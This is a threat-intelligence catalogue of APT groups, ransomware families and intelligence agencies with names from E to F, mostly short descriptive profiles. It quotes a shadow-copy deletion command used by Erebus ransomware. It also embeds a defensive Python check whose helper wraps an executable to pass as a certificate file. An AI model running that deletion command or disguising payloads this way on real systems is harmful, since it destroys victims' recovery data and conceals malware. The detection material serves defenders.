Earth Lamia

Earth Lamia is a China-nexus APT that targets organizations across multiple sectors, including finance, logistics, and government, primarily in Latin America, the Middle East, and Southeast Asia. The actor exploits web application vulnerabilities, such as CVE-2025-55182, and employs techniques like SQL injection, DLL sideloading, and the deployment of custom backdoors like PULSEPACK and BypassBoss. Earth Lamia conducts reconnaissance, file operations, and credential theft, often utilizing tools like Cobalt Strike and VShell.

Earth Longzhi

Earth Longzhi is a subgroup of APT41 targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji, and using “stack rumbling” via Image File Execution Options (IFEO), a new denial-of-service (DoS) technique to disable security software.

Earth Naga

Earth Naga is an APT group that has persistently targeted high-value organizations, including government agencies, telecommunications, and military-related manufacturers, primarily in Taiwan and the broader APAC region. They have been linked to the use of Draculoader and ShadowPad C&C infrastructure, demonstrating sophisticated TTPs such as establishing SSH connections through compromised mail servers. Earth Naga has collaborated with Earth Estries, sharing access to facilitate continued exploitation, complicating detection and attribution efforts. Their operations reflect a growing interest in global intelligence collection, extending to NATO member countries and Latin America.

Earth Wendigo

Earth Wendigo is a threat actor from China that has been targeting several organizations — including government organizations, research institutions, and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely used in Taiwan. The threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.

Earth Yako

Earth Yako is a threat actor that has been actively targeting researchers in academic organizations and think tanks in Japan. They use spearphishing emails with malicious attachments to gain initial access to their targets' systems. Earth Yako's objectives and patterns suggest a possible connection to a Chinese APT group, but conclusive proof of their nationality is lacking. They have been observed using various malware delivery methods and techniques, such as the use of Winword.exe for DLL Hijacking.

eBayWall

Ransomware

EbolaRnsmwr

Ransomware

EC2 Grouper

EC2 Grouper is a prolific threat actor known for leveraging AWS tools for PowerShell to conduct automated attacks in cloud environments. They typically utilize the CreateSecurityGroup API to establish remote access and exhibit a consistent security group naming convention. Credential acquisition is believed to stem from compromised cloud access keys, often sourced from public code repositories. Notably, their activities do not include calls to AuthorizeSecurityGroupIngress, suggesting a selective approach to escalation.

eCh0raix

Anomali researchers have observed a new ransomware family, dubbed eCh0raix, targeting QNAP Network Attached Storage (NAS) devices. QNAP devices are made by the Taiwanese company QNAP Systems, Inc., and provide device storage and media player functionality, amongst others. The devices appear to be compromised by brute forcing weak credentials and exploiting known vulnerabilities in targeted attacks. The malicious payload encrypts the targeted file extensions on the NAS using AES encryption and appends the .encrypt extension to the encrypted files. The ransom note created by the ransomware has the form shown below. eCh0raix was first seen in June 2019, after victims began reporting ransomware attacks in a forum topic on BleepingComputer. On June 1st, 2020, there was a sudden surge of eCh0raix victims seeking help in our forums and submissions to the ransomware identification site ID-Ransomware.

ECLR

Ransomware

Edalat-e Ali

Edalat-e Ali is a hacktivist group known for disrupting Iranian state-run TV and radio transmissions during significant events, such as the Revolution Day ceremonies. They have also targeted government facilities, releasing security camera footage to expose abuses and draw attention to human rights violations. The group has used their hacks to call for protests against the Iranian regime and have displayed anti-government messages during their disruptions. Edalat-e Ali has been active in releasing sensitive information and footage to embarrass Iranian officials and highlight injustices within the country.

EdgeLocker

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 0.1 Bitcoins. The original name is TrojanRansom.

Educated Manticore

Educated Manticore is an Iranian APT group aligned with the Islamic Revolutionary Guard Corps, primarily engaged in espionage targeting government, military, and academic sectors. The group employs spear-phishing tactics, utilizing custom backdoors like POWERLESS and phishing kits designed as SPAs to harvest credentials. Their operations have included impersonating credible figures to lure victims and using ISO images to initiate infection chains. Educated Manticore's activities are characterized by rapid domain setup and aggressive spear-phishing campaigns, particularly against Israeli individuals.

EduCrypt

Ransomware Based on Hidden Tear

EduRansom

ransomware

Egalyty

ransomware

EggLocker

Ransomware

Egregor

The threat group behind this malware seems to operate by hacking into companies, stealing sensitive data, and then running Egregor to encrypt all the files. According to the ransom note, if the company does not pay the ransom within 3 days, the group will leak part of the stolen data and, in addition, publicize the attack via mass media so that the company's partners and clients learn that the company was attacked.

Egyptian General Intelligence Directorate

Gihaz al-Mukhabarat al-Amma (GIS) (General Intelligence Service)

Egyptian Homeland security

Al-amn al-Watani (HS) (Homeland Security)

EiTest

Ransomware

Ekati demo tool

Ransomware

el dorado

This group is believed to be connected to Lost Trust. El Dorado rebranded to BlackLock in September 2024.

El Machete

El Machete is one of those threats that was first publicly disclosed and named by Kaspersky. We’ve found that this group has continued to operate successfully, predominantly in Latin America, since 2014. The attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.

El-Polocker

Ransomware with a GUI

Elcometa

Elcometa is an active extortion or ransomware group tracked by RansomLook.

Eldorado Ransomware Operators

This object reflects the ATT&CK Techniques associated with threat actors who deploy Eldorado, a ransomware-as-a-service ("RaaS") first advertised for sale on cybercrime forums in March 2024. Researchers assess that Eldorado is a "unique" ransomware strain that is likely not derived from previously leaked ransomware source code.[[Group-IB July 3 2024](/references/50148a85-314c-4b29-bdfc-913ab647dadf)] Windows and Linux-focused versions of the ransomware are known to exist. (ATT&CK Techniques associated with these malware binaries are tracked in a separate "Eldorado Ransomware" Software object.)

ELECTRIC PANDA

ELECTRIC PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Elonmusknow

Elonmusknow is an active extortion or ransomware group tracked by RansomLook.

ELOQUENT PANDA

ELOQUENT PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

elpaco

Elpaco is a variant of Mimic ransomware that emerged around August 2023. Designed with significant customization and stealth in mind, it targets Windows systems by abusing the Everything search utility to optimize file discovery and accelerate encryption. Operators exploit various initial access methods—most notably RDP brute-force and the Zerologon vulnerability (CVE-2020-1472)—to gain access, escalate privileges, and deliver the payload. The ransomware uses a 7z SFX dropper, deploys multi-threaded encryption, disables recovery options, and self-deletes after execution, leaving victims with encrypted files bearing Elpaco-specific extensions. It's recognized for its adaptability and advanced features compared to earlier Mimic variants.

ELUSIVE COMET

ELUSIVE COMET is a threat actor responsible for significant cryptocurrency theft through sophisticated social engineering attacks, particularly leveraging Zoom's remote control feature. Their attack methodology involves manipulating legitimate workflows and exploiting human-centric vulnerabilities rather than technical flaws. The actor employs tactics such as social proof, time pressure, and interface manipulation to deceive targets. Organizations can mitigate risks by implementing technical controls to disable the remote control feature and deploying email boundary protections like DMARC, SPF, and DKIM.

Embargo

Embargo is a Ransomware-as-a-Service (RaaS) operation first observed in May 2024. It employs a double-extortion model, encrypting victim data while exfiltrating sensitive files for publication on a Tor-based leak site. Embargo uses a Rust-based payload that leverages AES-256 and RSA-4096 encryption, deletes volume shadow copies, and disables recovery features to prevent restoration. Its targeting appears opportunistic but has included sectors such as finance, manufacturing, and professional services across North America, Europe, and Asia. The ransomware’s customization options, negotiation portal, and leak infrastructure suggest a closed affiliate model with a focus on operational security.

Emniyet Genel Müdürlüğü İstihbarat Başkanlığı

Emniyet Genel Müdürlüğü İstihbarat Başkanlığı (Intelligence Directorate)

Enc1

Ransomware

enciphered

aka xoriste

Encoder.xxxx

Ransomware coded in Go

EncoderCSL

Ransomware

EnCrypt

Ransomware

EncryptedBatch

Ransomware

EncrypTile Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

encryptoJJS

Ransomware

EncryptServer2018

Ransomware

Encryptss77 Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Endurance

Endurance is a destructive ransomware variant first observed in 2023, developed and operated by the threat actor known as IntelBroker (also referred to as Butler Spider). Rather than encrypting files for decryption, it functions primarily as a data wiper, overwriting file contents, appending randomized filenames, and then deleting the files altogether. The source code for the malware was intentionally made public by the operator, indicating its use as both a tool and a statement. Endurance was used in high-profile breaches, including targeting government agencies, large enterprises, and telecommunications providers.

ENERGETIC BEAR

A Russian group that collects intelligence on the energy industry.

Enforcement Directorate

Enforcement Directorate

Enigma 2 Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Enigma

Ransomware

Enjey

Ransomware Based on RemindMe

EnjeyCrypter Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

EnkripsiPC Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The name of the hacker is humanpuff69 and he requests 0.5 bitcoins. The encryption password is based on the computer name.

Ensiko

ransomware

Entropy

Entropy is a ransomware first seen in the first quarter of 2022 and used in conjunction with Dridex infections. The ransomware packs itself with a custom packer that has also been seen in some early Dridex samples.

ENVOY PANDA

ENVOY PANDA is a "China-nexus" actor, active since 2011, that has mainly targeted diplomatic entities associated with African and Middle Eastern governments.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)][[Envoy Panda Profile](/references/44879a86-9eda-4934-bfc4-cbc643ab113a)]

EnyBeny Nuclear Ransomware

@GrujaRS discovered a new in-development ransomware called EnyBeny Nuclear Ransomware that was meant to append the extension .PERSONAL_ID:.Nuclear to encrypted files, but failed due to a bug.

EnybenyCrypt

Ransomware

EnyBenyHorsuke Ransomware

GrujaRS discovered a new ransomware called EnyBenyHorsuke Ransomware that appends the .Horsuke extension to encrypted files.

EOEO

Ransomware

ep918

ep918 is an active extortion or ransomware group tracked by RansomLook.

EPICALLY

ransomware

Epoblockl

Ransomware

Epsilon

ransomware

EQ Ransomware

GrujaRS discovered the EQ Ransomware that drops a ransom note named README_BACK_FILES.htm and uses .f**k (censored) as its extension for encrypted files. May be GlobeImposter.

Equation Group

The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Labs as one of the most sophisticated cyber attack groups in the world, operating alongside, but always from a position of superiority over, the creators of Stuxnet and Flame.

Eraleign apt73

Eraleign apt73 is an active extortion or ransomware group tracked by RansomLook.

Erebus 2017 Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Erebus Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. After the files are encrypted, the shadow copies are deleted using the following command: vssadmin.exe Delete Shadows /All /Quiet

Erica2020

Ransomware

Eris

Ransomware

eruption

Rebranded to Sabbath.

Secretaría de Inteligencia Estratégica de Estado

State Secretariat of Strategic Intelligence - Secretaría de Inteligencia Estratégica de Estado (SIEE)

Esmeralda Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Estado Mayor Presidencial

2nd Section of the National Defense Intelligence Staff (SEDENA S-2 – Seccion 2da: Inteligencia del Estado Mayor)

Estemani

Ransomware

Estonian Foreign Intelligence Service

Estonian Foreign Intelligence Service (VLA) (Välisluureamet)

Estonian Internal Security Service

Estonian Internal Security Service (KaPo) (Kaitsepolitseiamet)

Eternal

Ransomware

Eternity

Ransomware

Etterretningstjenesten

Etterretningstjenesten (NIS) (Norwegian Intelligence Service)

Euclid

Ransomware

European Union Military Staff

European Union Military Staff (EUMS)

European Union Satellite Centre

European Union Satellite Centre (EU SatCen)

Evasive HT

Ransomware

Evasive Panda

Evasive Panda is an APT group that has been active since at least 2012, conducting cyberespionage targeting individuals, government institutions and organizations.

Everest Ransomware Actors

Threat actors known to deploy Everest, a ransomware strain that researchers have linked to both the previous Everbe 2.0 and BlackByte ransomware families.[[NCC Group Everest Ransomware July 13 2022](/references/33effb32-5c39-4bde-953d-12dc7be4db07)]

Everest

Everest is a ransomware group active since at least December 2020, known for its double-extortion tactics. The group initially operated as a typical ransomware outfit, encrypting files with strong cryptography and appending victim-specific extensions, but later shifted toward pure data extortion—threatening to sell or release stolen data without necessarily deploying encryption. Everest targets a wide range of sectors, including government, healthcare, manufacturing, and IT services, with confirmed victims in North America, Europe, and Asia. Initial access vectors include exploitation of vulnerable public-facing applications, phishing campaigns, and credential theft for remote access services. The group maintains a Tor-based leak site to publish stolen information and advertise access to compromised networks.

Evil Corp

Evil Corp is an international cybercrime network. In December 2019, the US Federal Government offered a $5M bounty for information leading to the arrest and conviction of Maksim V. Yakubets for allegedly orchestrating Evil Corp operations. The group is responsible for stealing over $100M from businesses and consumers. The Evil Corp organization is known for utilizing custom strains of malware such as JabberZeus, Bugat and Dridex to steal banking credentials.

Evil Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The KZ domain is used, so it is assumed that the decrypter is from Kazakhstan. Coded in JavaScript.

Evilbyte

EvilByte is a hacktivist group that has conducted several high-profile cyber attacks in 2024, including breaching MyFatoorah's banking system in retaliation against Saudi media and targeting Radio 10 Rosario in Argentina. The group has also claimed responsibility for breaching Israeli government websites and leaking data of government employees and intelligence agencies.

EvilPost

EvilPost is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

EvilTraffic

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands of compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenue via advertising.

EvilWeb

EvilWeb is a pro-Russian hacktivist group created in March 2024 that targets American and European entities using a hack-and-leak method alongside DDoS attacks. The group claims to have obtained data from various high-profile American organizations. EvilWeb announced its participation in the #FreeDurov operation on August 25, 2024, and began executing DDoS and hacking attacks. As of September 3, 2024, their Telegram channel has 1,146 members.

Evolution

Ransomware

ExCobalt

ExCobalt is an APT group that has been active since at least 2016 and is believed to be linked to the notorious Cobalt Gang. The group primarily targets Russian organizations across sectors, including metallurgy, telecommunications, mining, information technology, government, and software development, by exploiting supply chain weaknesses and compromised contractors for initial access. ExCobalt’s toolkit features a custom Golang-based backdoor, GoRed, which enables remote command execution, credential harvesting, and detailed system reconnaissance, while the group also employs established tools such as Spark RAT, Mimikatz, and multiple Linux privilege escalation exploits. Researchers note that ExCobalt continually evolves its tactics and even modifies standard utilities to bypass security controls and maintain persistent access, underscoring its commitment to sophisticated cyberespionage and data theft operations.

Executioner

Ransomware

ExecutionerPlus

Ransomware

Exerwa CTF

ransomware

Exitium

Exitium is an active extortion or ransomware group tracked by RansomLook.

Exocrypt XTC

Ransomware

ExoLock

Ransomware

Exorcist

ransomware

Exotic Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. It also encrypts executables.

ExpBoot

Ransomware

Explorer

Ransomware

Extortion Scam

Ransomware

Extractor

Ransomware

Eyecry

ransomware

EyLamo

Ransomware

EZDZ

Ransomware

Fabiansomware

Ransomware

FabSysCrypto Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Based on HiddenTear.

Facebook HT

Ransomware

Fadesoft Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 0.33 bitcoins.

Fail0verflow

Fail0verflow is a hacking group known for exploiting vulnerabilities in gaming consoles, notably the Nintendo Wii and PlayStation 3. They utilized techniques such as RAM shorting, buffer overflow, and a signing bug to achieve code execution and develop the Homebrew Channel for the Wii. In 2010, they compromised an ECDSA key for the PS3, and later announced the retrieval of PS5 symmetric root keys, enabling the potential for custom firmware and homebrew software. Their exploits often involve kernel access and have raised concerns about the implications for piracy and litigation in the gaming community.

Fairware

Ransomware targeting the Linux OS

Faizal

Ransomware

Fakben

Ransomware Based on Hidden Tear

Fake Cerber

Ransomware

Fake DMA

ransomware

Fake Globe Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 1 bitcoin.

Fake Locky Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all of the victim's files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

FakeCryptoLocker

Ransomware

Fakersa

Fakersa is an active extortion or ransomware group tracked by RansomLook.

Falcons Intelligence Cell

Falcons Intelligence Cell - (FIC) - (Military intelligence)

Fantom

Ransomware Based on EDA2

Farattack

Farattack is an active extortion or ransomware group tracked by RansomLook.

fargo

Fargo is a ransomware variant that surfaced in 2022, primarily targeting Microsoft SQL Server (MSSQL) systems. Believed to be a variant of the TargetCompany ransomware family, Fargo uses brute-force or credential-stuffing attacks on exposed MSSQL instances to gain access, then executes payloads via SQL Server commands. Once deployed, it encrypts files using a combination of symmetric and asymmetric algorithms, appends the .Fargo3 (or similar) extension, and drops a ransom note directing victims to contact operators via email. It also attempts to delete system backups and shadow copies to prevent recovery. Fargo has been observed targeting organizations in multiple sectors, with a concentration of victims in South Korea and other parts of Asia.

FartPlz

ransomware

FASTCash

Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.

Fastwind

ransomware

faust

Faust is a variant of the well-known Phobos ransomware, part of a Ransomware-as-a-Service (RaaS) ecosystem active since around May 2019. Faust employs a double-extortion model, encrypting victim files and threatening to release stolen data if ransom demands are not met. It's distributed via Office document payloads using VBA scripts and known for its fileless attack delivery, enabling stealth and evasion.

FBI Intelligence Branch

FBI Intelligence Branch (IB)

FBLocker

ransomware

FCP

ransomware

FCrypt

ransomware

FCT

ransomware

Federal Investigation Agency

Federal Investigation Agency (FIA)

Federal Office for Information Security

Bundesamt für Sicherheit in der Informationstechnik (BSI): Federal Office for Information Security

Federal Police Department

Federal Police Department (DPF) (counterintelligence agency)

Federal Police (Mexico)

Intelligence Division of the Federal Police (Division de Inteligencia – CNS / Policia Federal)

Federal Security Service (Russia)

Federal Security Service (FSB) – Федеральная служба безопасности

Femwar02

Femwar02 is a previously unknown pro-Russian ransomware threat actor that emerged in early 2026, linked to a major cyberattack on Italy's Sapienza University of Rome in February 2026, which caused a full network shutdown and operational disruptions. The group deploys Bablock (also known as Rorschach), a next-generation ransomware strain first identified in 2023 that features fast hybrid encryption (curve25519 and hc-128), partial file encryption for speed, direct system calls to evade detection, and domain-wide propagation via Group Policy on Windows Domain Controllers. Bablock shares code similarities with LockBit 2.0 but incorporates elements from other families like Babuk and DarkSide, often delivered via encrypted payloads, DLL sideloading with tools like DarkLoader, and exploits such as those in Zimbra or phishing. Notably, the malware skips encrypting files written in Russian, reinforcing its pro-Russian alignment, with no prior attributions or campaigns documented before the Sapienza incident.

FenixLocker

Ransomware

Fenrir

ransomware

FILE FROZR

Ransomware RaaS

File Ripper

ransomware

File Spider

A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia. These spam emails contain malicious Word documents that download and install the File Spider ransomware onto a victim's computer. File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia. The spam starts with subjects like "Potrazivanje dugovanja", which translates to "Debt Collection", and whose message, according to Google Translate, appears to be in Serbian.

FileCoder

A barely functional piece of macOS ransomware, written in Swift.

FileEngineering

ransomware

FileFuck

ransomware

Fileice Ransomware Survey Ransomware

This most likely affects English-speaking users, since the note is written in English; as English is understood worldwide, anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All of the victim's files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. A sample of how the hacker tricks the user using the survey method: https://1.bp.blogspot.com/-72ECd1vsUdE/WBMSzPQEgzI/AAAAAAAABzA/i8V-Kg8Gstcn_7-YZK__PDC2VgafWcfDgCLcB/s1600/survey-screen.png The hacker definitely has a sense of humor: https://1.bp.blogspot.com/-2AlvtcvdyUY/WBMVptG_V5I/AAAAAAAABzc/1KvAMeDmY2w9BN9vkqZO8LWkBu7T9mvDACLcB/s1600/ThxForYurTyme.JPG

FileLocker

The File-Locker Ransomware is a Hidden Tear variant that is targeting victims in Korea. When victims are infected, it leaves a ransom note requesting 50,000 Won, or approximately 50 USD, to get the files back. This ransomware uses AES encryption with a static password of "dnwls07193147", so it is easily decryptable.

FilesL0cker

ransomware

FIN1

FireEye first identified this activity during a recent investigation at an organization in the financial industry. They identified the presence of a financially motivated threat group that they track as FIN1, whose activity at the organization dated back several years. The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s), and used this malware to access the victim environment and steal cardholder data. FIN1, which may be located in Russia or a Russian-speaking country based on language settings in many of their custom tools, is known for stealing data that is easily monetized from financial services organizations such as banks, credit unions, ATM operations, and financial transaction processing and financial business services companies.

FIN11

FIN11 is a well-established financial crime group that has recently focused its operations on ransomware and extortion. The group has been active since 2017 and has been tracked under UNC902 and later on as TEMP.Warlok. In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. (FireEye) Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in a few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—are part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion. Notably, FIN11 includes a subset of the activity security researchers call TA505, Graceful Spider, Gold Evergreen, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

FIN7

FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Carbanak, leading these groups to be tracked separately. [FireEye FIN7 March 2017](https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html) [FireEye FIN7 April 2017](https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html) [FireEye CARBANAK June 2017](https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html) [FireEye FIN7 Aug 2018](https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html) [CrowdStrike Carbon Spider August 2021](https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/) [Mandiant FIN7 Apr 2022](https://www.mandiant.com/resources/evolution-of-fin7) [BiZone Lizar May 2021](https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319)

Final

ransomware

Financial Crimes Investigation Division

Financial Crimes Investigation Division

Financial Intelligence Division (FID)

Financial Intelligence Division (FID)

Financial Intelligence Unit (Bahamas)

Financial Intelligence Unit (FIU)

Financial Intelligence Unit (Barbados)

Financial Intelligence Unit (FIU)

Financial Intelligence Unit (Sri Lanka)

Financial Intelligence Unit (Sri Lanka)

Financial Intelligence Unit Trinidad and Tobago (FIUTT)

Financial Intelligence Unit Trinidad and Tobago (FIUTT)

Financial Investigations Division (FID)

Financial Investigations Division (FID)

Financial Monitoring Service (Azerbaijan)

Financial Monitoring Service (Maliyyə Monitorinqi Xidməti)

Financial Monitoring Unit

Financial Monitoring Unit (FMU)

Financial Transactions and Reports Analysis Centre of Canada

Financial Transactions and Reports Analysis Centre of Canada (FINTRAC)

FindZip

ransomware

Finnish Defence Intelligence Agency

Finnish Defence Intelligence Agency – Puolustusvoimien tiedustelulaitos (PVTIEDL) / Försvarsmaktens underrättelsetjänst

Finnish Security Intelligence Service

Finnish Security Intelligence Service (SUPO) – Suojelupoliisi / Skyddspolisen

FireCrypt

Ransomware

First

The ransom note is written in English, so the ransomware can target users worldwide. It is spread via email spam, fake updates, malicious attachments and similar lures. It encrypts all of the user's files, including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

Fishing Elephant

Fishing Elephant is a threat actor that primarily targets victims in Bangladesh and Pakistan. They rely on consistent TTPs, including payload and communication patterns, while occasionally incorporating new techniques such as geo-fencing and hiding executables within certificate files. Their tool of choice is AresRAT, which they deliver through platforms like Heroku and Dropbox. Recently, they have shifted their focus to government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine, and China.
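The "executables hidden within certificate files" technique mentioned above is a general one: a PE file is base64-encoded and wrapped in PEM "-----BEGIN CERTIFICATE-----" markers so it passes as harmless text and can be unpacked on the host with a certificate tool. The check below is an added example (not code from the page or from any vendor report on Fishing Elephant) that parses PEM blocks, decodes each body and looks at the leading bytes: a genuine DER certificate starts with an ASN.1 SEQUENCE byte (0x30), whereas a wrapped Windows executable starts with "MZ". The sample input is constructed inline and the PE stub is just a header, not a runnable binary.

```python
import base64
import re

# PEM block: label, base64 body, matching END marker.
PEM_RE = re.compile(
    r"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)

PE_MAGIC = b"MZ"          # DOS/PE executable header
ELF_MAGIC = b"\x7fELF"    # Linux executable header
ASN1_SEQUENCE = 0x30      # first byte of any DER-encoded X.509 certificate


def fake_pe_bytes() -> bytes:
    # Constructed stand-in for a dropped executable: a 64-byte DOS header with
    # the 'MZ' magic and e_lfanew pointing at a 'PE\0\0' signature. It is NOT
    # a working program, only enough for a header check to recognize it.
    header = bytearray(64)
    header[0:2] = PE_MAGIC
    header[0x3C:0x40] = (64).to_bytes(4, "little")
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 32


def wrap_as_certificate(payload: bytes) -> str:
    # How an attacker disguises a payload: base64 it and add PEM markers.
    body = base64.b64encode(payload).decode()
    lines = [body[i:i + 64] for i in range(0, len(body), 64)]
    return ("-----BEGIN CERTIFICATE-----\n" + "\n".join(lines)
            + "\n-----END CERTIFICATE-----\n")


def inspect_pem(text: str) -> list:
    # Returns one finding per PEM block: what the decoded body really is.
    findings = []
    for match in PEM_RE.finditer(text):
        label, body = match.group(1), match.group(2)
        try:
            raw = base64.b64decode("".join(body.split()), validate=True)
        except ValueError:
            findings.append({"label": label, "verdict": "invalid-base64"})
            continue
        if raw.startswith(PE_MAGIC):
            verdict = "pe-executable"
        elif raw.startswith(ELF_MAGIC):
            verdict = "elf-executable"
        elif raw[:1] == bytes([ASN1_SEQUENCE]):
            verdict = "der-asn1"       # consistent with a real certificate
        else:
            verdict = "unknown"
        findings.append({"label": label, "verdict": verdict, "size": len(raw)})
    return findings


if __name__ == "__main__":
    suspicious = wrap_as_certificate(fake_pe_bytes())
    for finding in inspect_pem(suspicious):
        print(finding)
```

A "der-asn1" verdict only means the body is not an obvious executable; a full check would parse the certificate with a library such as cryptography. Anything that decodes to MZ or ELF under a CERTIFICATE label is worth an alert, and so is a PEM file being decoded on a host that has no business handling certificates.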

FishMedley

Verticals targeted during Operation FishMedley include governments, NGOs and think tanks across Asia, Europe and the United States. Operators used implants such as ShadowPad, SodaMaster and Spyder that are common to, or exclusive to, China-aligned threat actors. ESET assesses with high confidence that Operation FishMedley was conducted by the FishMonger APT group.

Flamingo

ransomware

Flash Kitten

This suspected Iran-based adversary conducted long-running strategic web compromise (SWC) campaigns from December 2016 until public disclosure in July 2018. Like other Iran-based actors, the target scope for FLASH KITTEN appears to be focused on the MENA region.

Flatcher3

ransomware

FlatChestWare

HiddenTear variant; decryptable

Flax Typhoon

